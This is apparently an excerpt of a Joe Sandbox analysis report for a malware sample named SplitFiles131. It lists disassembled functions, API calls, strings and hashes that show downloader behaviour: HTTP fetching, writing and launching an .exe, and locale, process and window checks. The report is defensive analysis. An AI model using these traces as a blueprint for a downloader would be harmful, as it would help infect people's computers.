Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CriticalInit_thread_footerSection$EnterLeave$ConditionVariableWake
String ID: O@K\$\Desktop$mmBK${}k|
API String ID: 4264893276-1521651405
Opcode ID: 8df569c9253b2e4154696794805b32007486ec4b4e197a8cb0baa30961dbfd60
Instruction ID: c12f54c9c6adfdaa1c56a5fc3e30a9e30d2afb8bc8bcc1abd1d89b7747afa6d4
Opcode Fuzzy Hash: 8df569c9253b2e4154696794805b32007486ec4b4e197a8cb0baa30961dbfd60
Instruction Fuzzy Hash: 82D136B59003848BEB14DF78EC067AE7B70AB45308F14427ED9403B2D3D7B9A949CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401B30 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401BB5
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401BD4

Strings

text, xrefs: 00401E0C

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: FileInternet$PointerRead
String ID: text
API String ID: 3197321146-999008199
Opcode ID: cfdcce2f7d42716a26e30f2f88d0c2f3e955756d4473bc2f3cae5c265880f9cb
Instruction ID: 0e1f74b2381a2c47a752bf63778d692da1f3e37b415f6d44e4533426c8fd4264
Opcode Fuzzy Hash: cfdcce2f7d42716a26e30f2f88d0c2f3e955756d4473bc2f3cae5c265880f9cb
Instruction Fuzzy Hash: FDC17A70A002189FEB24CF25CD85BEAB7B9FF48704F1045E9E40AA7291DB75AE85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00404D40 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 368COMMON

Download Yara Rule

APIs

GetKeyboardLayoutList.USER32(00000400,?,DCBD048B), ref: 00404DD8
GetLocaleInfoA.KERNEL32(?,00000002,?,000001F4), ref: 00404E0D
__Init_thread_footer.LIBCMT ref: 00404FE8

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

Strings

|[]], xrefs: 00404F7D
|[]]GO@., xrefs: 00404FC6
GO@., xrefs: 00404F84

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterInfoInit_thread_footerKeyboardLayoutLeaveListLocaleVariableWake
String ID: GO@.$|[]]$|[]]GO@.
API String ID: 4140350330-2383573185
Opcode ID: ec2d637ad3e7bc1ee14cb4dca0750debf56f2c276a93391e24e87bf3bab5fd92
Instruction ID: 94e34afb144a66a85c58054fe8ab4e0848c0f8c8b7af94ec091aa244651e6c2c
Opcode Fuzzy Hash: ec2d637ad3e7bc1ee14cb4dca0750debf56f2c276a93391e24e87bf3bab5fd92
Instruction Fuzzy Hash: 7EE1C371D002598BDB14CF68CC847EEBBB1EF49314F14466AE405B72C2DB79AA84CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00404F20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 218COMMON

Download Yara Rule

APIs

Part of subcall function 00404D40: GetKeyboardLayoutList.USER32(00000400,?,DCBD048B), ref: 00404DD8
Part of subcall function 00404D40: GetLocaleInfoA.KERNEL32(?,00000002,?,000001F4), ref: 00404E0D

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 00404FE8

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

Strings

|[]], xrefs: 00404F7D
|[]]GO@., xrefs: 00404FC6
GO@., xrefs: 00404F84

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInfoInit_thread_footerKeyboardLayoutListLocaleVariableWake
String ID: GO@.$|[]]$|[]]GO@.
API String ID: 960455753-2383573185
Opcode ID: 58e962a3c83b38df1713b6c3c7ae518e95050e33851920dfad0a4c97fcebbe43
Instruction ID: 3f3761a2ce6209ac4365e9edb3218e4554d877b29476edc6aaeebbc4e421452e
Opcode Fuzzy Hash: 58e962a3c83b38df1713b6c3c7ae518e95050e33851920dfad0a4c97fcebbe43
Instruction Fuzzy Hash: F581B375D002598BDB14DFA8D8857AFBBB0EF09314F54027AE401BB3D2D778A948CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00405350 Relevance: 6.1, APIs: 4, Instructions: 80processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0040536A
Process32First.KERNEL32(00000000,00000128), ref: 00405384
Process32Next.KERNEL32 ref: 004053BB
FindCloseChangeNotification.KERNEL32(00000000,?,?), ref: 004053C2

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 8135d8b86f741ced22b6e495a0d61fe9958d4fa32e71604d153aa300f03aaae6
Instruction ID: 5e486a24114f457a1f86916b08eb67cf77cbee6b56fc5b3387bb74bba5914992
Opcode Fuzzy Hash: 8135d8b86f741ced22b6e495a0d61fe9958d4fa32e71604d153aa300f03aaae6
Instruction Fuzzy Hash: 7C21F031200118ABDB20DF26DD45BEF37A9EB45345F50057AE805E6281EB78DA82CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00417BAF Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0041CC1F,?,00417BAE,00000000,?,0041CC1F,00000000,0041CC1F), ref: 00417BD1
TerminateProcess.KERNEL32(00000000,?,00417BAE,00000000,?,0041CC1F,00000000,0041CC1F), ref: 00417BD8
ExitProcess.KERNEL32 ref: 00417BEA

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ed8121747a5916c0d4d7e76e5998f8eb11bb96fe12b92581084defb0bd95f10c
Instruction ID: 57c928e6e796ec7aea49f19cfabf78c9b525272d76e34185ca50371a21d47389
Opcode Fuzzy Hash: ed8121747a5916c0d4d7e76e5998f8eb11bb96fe12b92581084defb0bd95f10c
Instruction Fuzzy Hash: 5CE04631108148AFCB212F66DC09EA93B79FB04389B508839F90586231CB39EC93CA88

Uniqueness

Uniqueness Score: -1.00%

Function 0040F789 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000F795,0040F328), ref: 0040F78E

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1d47e3287a5f49425792cbec75295ec78f4a03d4d2f0f0eea672fc119a570182
Instruction ID: c441ddb958a20976f8478718b12c4a1fde45198c9b197ccf8dba8fb5fcb3ec3f
Opcode Fuzzy Hash: 1d47e3287a5f49425792cbec75295ec78f4a03d4d2f0f0eea672fc119a570182
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10001010 Relevance: 49.7, APIs: 19, Strings: 9, Instructions: 740
networkcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetSetFilePointer.WININET(10001898,00000000,00000000,00000000,00000000), ref: 10001095
InternetReadFile.WININET(10001898,00000000,000003E8,00000000), ref: 100010B4
HttpQueryInfoA.WININET(10001898,0000001D,?,00000103,00000000), ref: 10001148
CoCreateInstance.OLE32(?,00000000,00000001,100101B0,?), ref: 10001181
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,?,?), ref: 10001224
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 1000126A
__cftof.LIBCMT ref: 100016EA
InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 10001703
InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001726
InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 10001746
HttpOpenRequestA.WININET(00000000,GET,00000000,00000000,00000000,00000000,80400000,00000001), ref: 10001779
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 100017D0
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 100017F6
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 1000181C
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 10001842
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 10001885
InternetCloseHandle.WININET(00000000), ref: 1000189C
InternetCloseHandle.WININET(?), ref: 100018A4
InternetCloseHandle.WININET(00000000), ref: 100018AA

Strings

http://, xrefs: 100015A2
text, xrefs: 100012EC
GET, xrefs: 10001773
invalid string position, xrefs: 10001960
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 10001795
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 100017D4
pYhv, xrefs: 100016CE, 1000188F
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001820
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 100017FA

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: Internet$Http$Request$Headers$CloseHandle$ByteCharFileMultiOpenWide$ConnectCreateInfoInstanceOptionPointerQueryReadSend__cftof
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$invalid string position$pYhv$text
API String ID: 3831252183-3393006363
Opcode ID: 928840d67b81dec85a459f9b0e9ad04d7454cd60734cdd5e754f0154346cdfd8
Instruction ID: 9cfefb4acadf1673c11eeb4d9e0c75330180c00a45bf6efb74ded1e1255f97de
Opcode Fuzzy Hash: 928840d67b81dec85a459f9b0e9ad04d7454cd60734cdd5e754f0154346cdfd8
Instruction Fuzzy Hash: 7D52B171E00218AFEB25CF68CC85BEEB7B9FF48340F504198E509AB295DB75AA45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100014F0 Relevance: 35.4, APIs: 13, Strings: 7, Instructions: 363
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

http://, xrefs: 100015A2
GET, xrefs: 10001773
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 10001795
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 100017D4
pYhv, xrefs: 100016CE, 1000188F
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001820
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 100017FA

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID:
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$pYhv
API String ID: 0-4268195717
Opcode ID: d3ed00dd38609a7697d672608ec4d1622f700f7468701cf831d89b042d405c33
Instruction ID: 3e25db80656cceb02cc8fd81e0400d570f0dd4959431d348fe5b88a2f33083bb
Opcode Fuzzy Hash: d3ed00dd38609a7697d672608ec4d1622f700f7468701cf831d89b042d405c33
Instruction Fuzzy Hash: 86D1C231E00208AFEB11CFA8CC95FEEBBB9EF45390F644118F515AB295C775AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE60 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(004504FC,00000FA0,?,?,0040EE3E), ref: 0040EE6C
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0040EE3E), ref: 0040EE77
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040EE3E), ref: 0040EE88
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0040EE9A
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0040EEA8
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040EE3E), ref: 0040EECB
DeleteCriticalSection.KERNEL32(004504FC,00000007,?,?,0040EE3E), ref: 0040EEE7
CloseHandle.KERNEL32(00000000,?,?,0040EE3E), ref: 0040EEF7

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040EE72
kernel32.dll, xrefs: 0040EE83
SleepConditionVariableCS, xrefs: 0040EE94
WakeAllConditionVariable, xrefs: 0040EEA0

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 6a30901e0316293d9dd8d087d713a46f6d2382c1dc1a8c068fa87155fa23cfe1
Instruction ID: 0577adb6b1f793cc774404ca345485d9f3401ded944aeed88ccdd136dffad262
Opcode Fuzzy Hash: 6a30901e0316293d9dd8d087d713a46f6d2382c1dc1a8c068fa87155fa23cfe1
Instruction Fuzzy Hash: 38019234740325ABD7305B73EC09B373AA8AB41B027940836FD04E22D1DA78CC1286AD

Uniqueness

Uniqueness Score: -1.00%

Function 004019F0 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 103
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401A67
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401A8D

Part of subcall function 004026B0: Concurrency::cancel_current_task.LIBCPMT ref: 004027E3

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401AB3
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401AD9

Strings

text, xrefs: 00401E0C
pYhv, xrefs: 00402165, 00402238
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401AB7
GET, xrefs: 0040220D
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 00401A91
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00401A6B
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401A29

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: HeadersHttpRequest$Concurrency::cancel_current_task
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$pYhv$text
API String ID: 2146599340-343719610
Opcode ID: fcad180c4c3fe079648477ce6e35f16694a51aef3eb89b63915f875012574e84
Instruction ID: 621c8db50826d68fbf5915584c3f353caeca61d3b6748355fd6bd9a3799d1aaf
Opcode Fuzzy Hash: fcad180c4c3fe079648477ce6e35f16694a51aef3eb89b63915f875012574e84
Instruction Fuzzy Hash: EF316F31E00109EBEB15DFA9CC85FEEBBB9EB48714F60C02AE121761C0D779A544CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10002450 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 400
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10006436: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10002479,00000000), ref: 10006449
Part of subcall function 10006436: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000647A

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 10002842
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 1000286D
CloseHandle.KERNEL32(00000000), ref: 10002874
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10002902
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 1000292F
CoUninitialize.OLE32 ref: 100029E6
Concurrency::cancel_current_task.LIBCPMT ref: 10002A02

Strings

D, xrefs: 1000288B
.exe, xrefs: 100025CA, 100025DB
open, xrefs: 10002928

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: File$CreateTime$CloseConcurrency::cancel_current_taskExecuteHandleProcessShellSystemUninitializeUnothrow_t@std@@@Write__ehfuncinfo$??2@
String ID: .exe$D$open
API String ID: 486856157-1167955346
Opcode ID: 94542779c2cbe68dcfa0da88a96b167bcfe548502e27a71f2e7a21729ccdced1
Instruction ID: a5dc631b58f12eb130fcfc4579c604e67e83b8f68047a22d4781f4a2ecc51844
Opcode Fuzzy Hash: 94542779c2cbe68dcfa0da88a96b167bcfe548502e27a71f2e7a21729ccdced1
Instruction Fuzzy Hash: 2CE1E2716083809BF724CB24CC45B9FB7E5FF85380F108A2CF599962D5DBB1E9848B92

Uniqueness

Uniqueness Score: -1.00%

Function 004286BE Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00428377: CreateFileW.KERNEL32(00000000,00000000,?,00428767,?,?,00000000,?,00428767,00000000,0000000C), ref: 00428394

GetLastError.KERNEL32 ref: 004287D2
__dosmaperr.LIBCMT ref: 004287D9
GetFileType.KERNEL32(00000000), ref: 004287E5
GetLastError.KERNEL32 ref: 004287EF
__dosmaperr.LIBCMT ref: 004287F8
CloseHandle.KERNEL32(00000000), ref: 00428818
CloseHandle.KERNEL32(0041E0F8), ref: 00428965
GetLastError.KERNEL32 ref: 00428997
__dosmaperr.LIBCMT ref: 0042899E

Strings

H, xrefs: 00428923

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: cdf5ef2873a73ee89aeb392416d28c2a8e100c1643c37962a50c484033c6f312
Instruction ID: 1e70075c2325eb26896e542e756e04c6963ea449c89895b1e211c5b43069dcbf
Opcode Fuzzy Hash: cdf5ef2873a73ee89aeb392416d28c2a8e100c1643c37962a50c484033c6f312
Instruction Fuzzy Hash: 76A15D32B001649FCF19EF68EC51BAE3BA1AB46314F54015EF811EB392CB39D942CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004065E0 Relevance: 12.1, APIs: 8, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?), ref: 00406603
OpenProcessToken.ADVAPI32(00000000), ref: 0040660A
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 00406623
CloseHandle.KERNEL32(?), ref: 00406630
CloseHandle.KERNEL32(?), ref: 00406646
AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00406666
EqualSid.ADVAPI32(?,?), ref: 00406677
FreeSid.ADVAPI32(?), ref: 00406682

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AllocateCurrentEqualFreeInformationInitializeOpen
String ID:
API String ID: 1013447061-0
Opcode ID: 8e728c0aa3363026ab09ef20ff487f076741c97f8360c68268a6665fe9e221c8
Instruction ID: 578e346a92eed40973933b436f29d829d3a9d7cfed80168a2ded3e3812858e1e
Opcode Fuzzy Hash: 8e728c0aa3363026ab09ef20ff487f076741c97f8360c68268a6665fe9e221c8
Instruction Fuzzy Hash: 3E111F31B0021CABDB20DFE1DD49BAEB7B9FF08701F400479E906EA190DAB599169B59

Uniqueness

Uniqueness Score: -1.00%

Function 00408D00 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 347sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00405F40: __Init_thread_footer.LIBCMT ref: 00405FE0
Part of subcall function 00405F40: __Init_thread_footer.LIBCMT ref: 004060D6

Sleep.KERNEL32(?,DCBD048B), ref: 00408D5F

Part of subcall function 00405F40: __Init_thread_footer.LIBCMT ref: 004061D5
Part of subcall function 00405F40: GetForegroundWindow.USER32 ref: 00406276
Part of subcall function 00405F40: GetWindowTextA.USER32 ref: 00406291

Sleep.KERNEL32(?,00000000,00000000,?,?,?,?,00439B30,DCBD048B), ref: 00408F14
Sleep.KERNEL32(00000004,00000000,?,?,?,?,00439B30,DCBD048B), ref: 00408F24
Sleep.KERNEL32(00000BB8,00000000,00439B34,?,?,?,?,?,?,?,?,00439B30,DCBD048B), ref: 00408FE8
Sleep.KERNEL32(000007D0), ref: 004091C7

Part of subcall function 00403770: CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,DCBD048B), ref: 004037F0
Part of subcall function 00403770: CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403814
Part of subcall function 00403770: _mbstowcs.LIBCMT ref: 00403867
Part of subcall function 00403770: CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 0040387E
Part of subcall function 00403770: GetLastError.KERNEL32 ref: 00403888

Sleep.KERNEL32(000007D0), ref: 004091D4

Strings

)<, xrefs: 00408E12

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Sleep$CryptInit_thread_footer$HashWindow$AcquireContextCreateDataErrorForegroundLastText_mbstowcs
String ID: )<
API String ID: 1673536643-2400745456
Opcode ID: 23d203c44105ae4b2082f425863ddf676ccaa81f6680862cae038eba0604537e
Instruction ID: 70604cc1ca8e53ac9b92178323d8b5bc0271906fc0c0c9cf9f081b3e31f09ae7
Opcode Fuzzy Hash: 23d203c44105ae4b2082f425863ddf676ccaa81f6680862cae038eba0604537e
Instruction Fuzzy Hash: C6C1C1B09001588ADB18F775CD997EE72689F5030CF4401BEE90AB72D2EE7C5E49CA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00409500 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 148sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00418873: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040953A,00000000), ref: 00418886
Part of subcall function 00418873: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004188B7

CreateThread.KERNEL32 ref: 004095FE
Sleep.KERNEL32(00000BB8), ref: 00409609

Strings

start, xrefs: 00409660
/chk, xrefs: 00409590
test, xrefs: 004095DE
SUB=, xrefs: 0040960F

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Time$CreateFileSleepSystemThreadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: /chk$SUB=$start$test
API String ID: 4044491330-2206718722
Opcode ID: 0b7e1866d143fc2a1f884dde0244745e592096d5921bc9574330ee586fdfa3a8
